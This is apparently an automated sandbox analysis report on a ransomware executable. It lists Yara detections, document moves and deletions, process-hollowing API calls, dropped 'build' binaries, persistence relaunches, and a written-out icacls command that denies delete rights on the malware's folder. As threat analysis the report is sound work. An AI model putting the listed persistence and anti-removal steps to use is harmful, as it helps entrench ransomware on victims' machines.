            Source: Yara matchFile source: 0000000A.00000002.691494712.0000000004A60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.702014629.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.691200902.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000001.664324042.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000001.698844163.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000001.687940969.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000001.651406609.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000001.668266600.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.671391421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TpZ10Hfjov.exe PID: 6440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TpZ10Hfjov.exe PID: 6584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TpZ10Hfjov.exe PID: 6764, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TpZ10Hfjov.exe PID: 6796, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: TpZ10Hfjov.exe PID: 6824, type: MEMORYSTR
            Modifies existing user documents (likely ransomware behavior)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile moved: C:\Users\user\Desktop\BQJUWOYRTO.docxJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile deleted: C:\Users\user\Desktop\BQJUWOYRTO.docxJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile moved: C:\Users\user\Desktop\PWZOQIFCAN\BQJUWOYRTO.xlsxJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile deleted: C:\Users\user\Desktop\PWZOQIFCAN\BQJUWOYRTO.xlsxJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile moved: C:\Users\user\Desktop\IZMFBFKMEB.pdfJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040D240
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00419F90
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040C070
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0042E003
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0042F010
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00410160
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0044237E
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_004344FF
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040A660
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0041E690
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040274E
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040A710
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040F730
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0044D7A1
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0042C804
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0044D9DC
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00449A71
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00443B40
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0044ACFF
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040DD40
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040BDC0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABB0B0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AB30EE
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AC00D0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AD18D0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABB000
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ADE9A3
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ADF9B0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABE6E0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABCA10
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABDBE0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AC0B00
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04ABC760
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049EB0B0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049F00D0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_04A018D0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049E30EE
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049EB000
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_04A0E9A3
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_04A0F9B0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049EE6E0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049ECA10
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049EDBE0
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049F0B00
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049EC760
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0042E003
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040D240
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0041E690
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040F730
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00419F90
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D050
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040C070
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0042F010
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D008
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D028
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D090
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D0A8
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00410160
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0044237E
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050C4E0
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_004344FF
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0043E5A3
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0044B5B1
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040A660
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040274E
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040A710
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: String function: 04A08EC0 appears 38 times
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: String function: 04A10160 appears 31 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 04AD8EC0 appears 38 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 00428C81 appears 36 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 0042F7C0 appears 65 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 04AE0160 appears 31 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 0044F23E appears 68 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 00428520 appears 78 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 00441A25 appears 35 times
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: String function: 004547A0 appears 55 times
            Source: TpZ10Hfjov.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2[1].exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2[1].exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2[1].exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2[1].exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: build2.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: TpZ10Hfjov.exe, 00000003.00000002.661474517.0000000002D00000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000003.00000002.661364692.0000000002B80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000003.00000002.661551532.0000000002D60000.00000002.00000001.sdmpBinary or memory string: originalfilename vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000003.00000002.661551532.0000000002D60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000003.00000002.661321948.0000000002A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.813034475.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000003.691848171.00000000094E0000.00000004.00000001.sdmpBinary or memory string: System.OriginalFileName vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.813048190.0000000002CC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.815120762.0000000009630000.00000002.00000001.sdmpBinary or memory string: originalfilename vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.815120762.0000000009630000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.814385551.00000000094A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamempr.dll.muij% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exe, 00000008.00000002.813120379.0000000002E60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs TpZ10Hfjov.exe
            Source: TpZ10Hfjov.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
            Source: 6.2.TpZ10Hfjov.exe.4ab15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 8.1.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.TpZ10Hfjov.exe.4a115a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 6.2.TpZ10Hfjov.exe.4ab15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 3.2.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 3.1.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 3.2.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 7.2.TpZ10Hfjov.exe.49e15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 8.2.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 7.2.TpZ10Hfjov.exe.49e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 8.1.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 8.2.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.TpZ10Hfjov.exe.4a115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 3.1.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0000000F.00000002.702014629.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0000000C.00000002.691200902.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000008.00000001.664324042.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0000000F.00000001.698844163.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0000000C.00000001.687940969.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000003.00000001.651406609.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000009.00000001.668266600.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 00000009.00000002.671391421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: TpZ10Hfjov.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: TpZ10Hfjov.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: build2[1].exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: build2.exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.spre.evad.winEXE@30/3@7/4
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            Source: TpZ10Hfjov.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: TpZ10Hfjov.exeVirustotal: Detection: 33%
            Source: TpZ10Hfjov.exeReversingLabs: Detection: 36%
            Source: TpZ10Hfjov.exeString found in binary or memory: set-addPolicy
            Source: TpZ10Hfjov.exeString found in binary or memory: id-cmc-addExtensions
            Source: TpZ10Hfjov.exeString found in binary or memory: set-addPolicy
            Source: TpZ10Hfjov.exeString found in binary or memory: id-cmc-addExtensions
            Source: TpZ10Hfjov.exeString found in binary or memory: set-addPolicy
            Source: TpZ10Hfjov.exeString found in binary or memory: id-cmc-addExtensions
            Source: TpZ10Hfjov.exeString found in binary or memory: id-cmc-addExtensions
            Source: TpZ10Hfjov.exeString found in binary or memory: set-addPolicy
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile read: C:\Users\user\Desktop\TpZ10Hfjov.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d' /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: unknownProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task
            Source: unknownProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart
            Source: unknownProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe'
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart
            Source: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exeProcess created: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe'
